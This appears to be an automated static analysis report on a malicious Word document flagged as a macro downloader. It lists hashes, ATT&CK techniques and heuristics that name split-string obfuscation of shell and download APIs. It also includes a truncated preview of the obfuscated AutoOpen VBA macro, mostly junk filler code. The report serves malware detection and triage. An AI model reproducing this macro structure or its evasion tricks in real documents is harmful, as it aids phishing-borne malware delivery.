Malicious Office (OLE) — malware analysis report

Static analysis result for SHA-256 566c79acc5b6aca2…

MALICIOUS

Office (OLE)

195.6 KB Created: 2019-04-17 11:21:00 Authoring application: Microsoft Office Word First seen: 2019-09-30
MD5: 1668136a81b0943205f6eb6bc27a42d8 SHA-1: 27c0b89f388e12b53667a0e3f50b6217e6418b57 SHA-256: 566c79acc5b6aca21ec8ad0859b2f53a1f0d4a00e793b4e6cba5fdb53cb2bafa
282 Risk Score

Malware Insights

MITRE ATT&CK
T1059.005 Visual Basic T1566.001 Spearphishing Attachment

The sample is a malicious Office document containing a VBA macro with an autoopen subroutine. Heuristics indicate obfuscation techniques and the use of GetObject to execute code, likely to download and run a second-stage payload. The macro attempts to reassemble the string 'Win32_Process', suggesting an intent to interact with running processes.

Heuristics 8

  • ClamAV: Doc.Downloader.00536d-6944297-0 critical CLAMAV_DETECTION
    ClamAV detected this file as malware: Doc.Downloader.00536d-6944297-0
  • VBA macros detected medium 4 related findings OLE_VBA_MACROS
    Document contains VBA macro code
  • Dangerous API name reassembled from split string literals critical OLE_VBA_SPLIT_KEYWORD_OBFUSCATION
    VBA concatenates short string literals that reassemble a dangerous API/ProgID/LOLBin name (e.g. Scripting.FileSystemObject, WScript.Shell, powershell, URLDownloadToFile) which appears in no single literal. Splitting an API name across string concatenation is done only to evade keyword scanning.
  • AutoOpen macro high OLE_VBA_AUTOOPEN
    AutoOpen macro
  • GetObject call high OLE_VBA_GETOBJ
    GetObject call
  • VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXEC
    Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
  • Legacy WordBasic auto-exec macro marker medium OLE_LEGACY_WORDBASIC_AUTOEXEC
    OLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
  • Embedded URL info EMBEDDED_URL
    One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
    URL http://schemas.openxmlformats.org/drawingml/2006/main In document text (OLE body)

Extracted artifacts 1

Files carved from inside the sample during analysis.

FilenameKindSourceSize
macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source) 28550 bytes
SHA-256: 5a0d220e71aa010401d5ebe483a3f0e3753e4e82cde16bbe15486a13eea1a867
Preview script
First 1,000 lines of the extracted script
Attribute VB_Name = "lQ4DxX"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True

Attribute VB_Name = "joAXZA"
Attribute VB_Base = "0{6CCF1993-C999-4F57-B273-ED66A87AD96E}{5092B10A-12CB-49F0-8E07-C503D9BA76D1}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False

Attribute VB_Name = "nQAAQ_"
Attribute VB_Base = "0{15E255D2-EF37-42AA-98CC-BF757E6A8AC9}{2F84DC7F-1C21-4B22-96B5-F501EE8894E0}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False

Attribute VB_Name = "skAAA44"
Sub autoopen()
   If mBB_UkB = FABAAUxC Then
    NUBkAQxw = 40652062 * wAAXQwC
  ElseIf SAxX_AQU = hAwQGC Then
    Set aUUoQAA = V4_XDQ
  ElseIf GUAAAw = mADADQ Then
   oA_x_DBo = HQAkB1 / cwwQQZk * FCUAAD + Sqr(h1woQkA)
  ElseIf DAZ4QDA = BAcGcA Then
   XCCZZA = 27339839
End If
   If zGCAA_ = WC4GABx Then
    IBCAcA = 427739662 * DZ41AB
  ElseIf wZcBkZAw = wXZAGc_A Then
    Set oxAZ_cUw = KQAG4Q
  ElseIf CDwx4Q = iABAAZ Then
   KCA_Uk = WXUAABA / NXAZQUA * RGUXAU + Sqr(YA1cAAA)
  ElseIf VAAQAxU = QoUAQQA Then
   WkAoxkoD = 73589769
End If
   If YUAUGkAB = fZQU_CUQ Then
    oUAABUA = 312282061 * UZAU_C
  ElseIf ZUAGUGw = iwkU1ZD Then
    Set hGBCACDA = iDwQBB
  ElseIf VDcDUcD = TBDxQ_ Then
   XUQAwA = FxcDG1 / ACBAB1 * iBcA1kA + Sqr(NUAAAXQ)
  ElseIf PCUkUDGA = hoAABCA Then
   AxccDAA = 907020580
End If
nXQ4AD
   If HxBAAAw = XQCDAw Then
    RAcQCc = 583652363 * FBGUUoUG
  ElseIf Q4_AAA = vQBAoADD Then
    Set vXAcCU = RDAoBG4
  ElseIf UBUAkB = RoGUZAAA Then
   YAAGQwkD = BcABCocw / pAAA4BxC * kAAAAA + Sqr(EZAxkQAD)
  ElseIf mADkD1Ck = CCXXAU Then
   hAGACAkA = 767101096
End If
   If wDxAAAw = E_QAABB Then
    rCABAAC = 832649815 * GAw1oD
  ElseIf Z1o4G1DZ = LA44AA Then
    Set cUCwoA = pxoXGc
  ElseIf EDZwAZ = cA4xQZx Then
   oBBBAA = dZAAAQA1 / CAoBAC1 * lGB1xA + Sqr(VXABCC1U)
  ElseIf A_wDAxc = QCQAQB Then
   NxwAUAAB = 76026590
End If
   If cUZAQA1 = o1A1Qcw1 Then
    V__AXG = 739424599 * TAAoBAXA
  ElseIf JDXCABkG = zQGUBQxD Then
    Set zAwAQA = MABDBQQ
  ElseIf aXDAxA = iGAAAkkA Then
   TAAXABAU = tAAAA1 / GwcAUQXc * KA_AAA + Sqr(YABQA4A)
  ElseIf jZxQA4 = rAA_wc Then
   iXAAwkUw = 185960431
End If
End Sub

Attribute VB_Name = "jAkXXX"
Function nXQ4AD()
On Error Resume Next
   If TDCABBA = RZUUZD4D Then
    HZk1cAA = 111488983 * zxDwAX
  ElseIf lDkQZxU = i1BxABcU Then
    Set DcA1_G = RAAQ1AwG
  ElseIf SckAUA = JwAADZAC Then
   PDGDUDA = HxkQDAG / GA1AUG * AoQGUDB + Sqr(jAA1ABB)
  ElseIf pAAQAUX = WDZDx4DA Then
   tAA1Axk = 8828071
End If
   If GUcAQ1QX = qok1ABo Then
    IcXCAxAk = 433040459 * nDAxDAw
  ElseIf nGowACQx = q4wZcQCQ Then
    Set ZADw_AU = vD4kUA
  ElseIf zQGwxc = tQ4BAA Then
   VU4BGAUw = LQw_AD_G / hk_XQD4w * q_UUUc + Sqr(WwD_ZDQA)
  ElseIf lAD4_UA = Wx4AXD_D Then
   bQBAQw = 763825975
End If
   If jAZQkx4 = PcGDkAD Then
    NUBcAAk = 110199077 * MAcX4QQ
  ElseIf bBkUGA = T_ABZQQZ Then
    Set jAAGxAkA = pAADAA
  ElseIf HAoDQCAG = nAAGABAQ Then
   dZAx_AcA = nBAAD_ / GQAAoX * ukAwXAQ + Sqr(iABoACA)
  ElseIf JXUAADZ = jcw4DkA Then
   DUDZxXAU = 418060932
End If
If 7304 < 17404 Then
VABXAA = vbFalse
   If fGBDAcAo = Vw_BAA Then
    YAwA_XQA = 288468827 * F4AAAkwX
  ElseIf uAAwXAkQ = nZXAwGQ Then
    Set qXGUAx_ = BAwAwk
  ElseIf wB1AUU = J4AoAQA Then
   UZwGAwUU = WwZAA4CU / MAABCAAx * NAw_BAD + Sqr(SB_AGUw)
  ElseIf U1oDDkB = iU4QUw4_ Then
   CAUw1A = 877920435
End If
   If dUA4CUD = r1UAAZ_A Then
    wBADAAUA = 350890717 * jQAAZAQA
  ElseIf zxQABU = rcAGBQ4 Then
    Set lXBCcUA = ZAQAAAQQ
  ElseIf kBDUAAZU = jUAXBAAD Then
   
... (truncated)